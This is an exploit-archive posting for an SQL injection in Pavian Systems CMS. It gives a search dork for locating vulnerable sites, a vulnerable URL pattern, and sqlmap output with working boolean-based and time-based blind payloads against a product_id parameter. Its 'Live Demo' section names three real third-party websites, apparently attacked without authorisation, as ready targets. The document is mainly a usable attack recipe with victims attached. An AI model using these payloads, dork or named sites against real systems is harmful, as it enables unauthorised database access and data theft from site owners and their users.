Pavian Systems CMS SQL injection Vulnerability

2016-10-05T00:00:00
ID 1337DAY-ID-25354
Type zdt
Reporter xBADGIRL21
Modified 2016-10-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title :  Pavian Systems CMS SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Vendor Homepage : http://paviansystems.com/
# Dork : All Rights Reserved. Design by paviansystems.
# Tested on: [ WINDOWS 7]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 05/10/2016
# video Proof : https://youtu.be/1CyISmcwJiU
######################
# [<] DESCRIPTION :
######################
# [+] Pavian Computer Systems is leading web and software development company 
# [+] that focuses on the areas that are critical to achieving maximum efficiency in IT Environment Utilization
# [+] AND an SQL injection has been Detected in Pavian Systems CMS
######################
# [<] Poc :
######################
# [ALL] Parameters Vulnerable To SQLi
# http://localhost/allp.php?id=[SQLi]
######################
# [<] SQLmap PoC:
######################
# GET parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
# sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:
# ---
# Parameter: product_id (GET)
#    Type: boolean-based blind
#    Title: AND boolean-based blind - WHERE or HAVING clause
#    Payload: product_id=38' AND 2172=2172 AND 'vXuF'='vXuF
#
#    Type: AND/OR time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind
#    Payload: product_id=38' AND SLEEP(5) AND 'nneA'='nneA
# ---
######################
# [<] Live Demo :
######################
# http://cit84.com/reflections_detail.php?artid=2 
# http://www.growingcrops.in/services.php?id=54
# http://www.vgaexports.com/product_detail.php?product_id=38
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2018-04-02]  #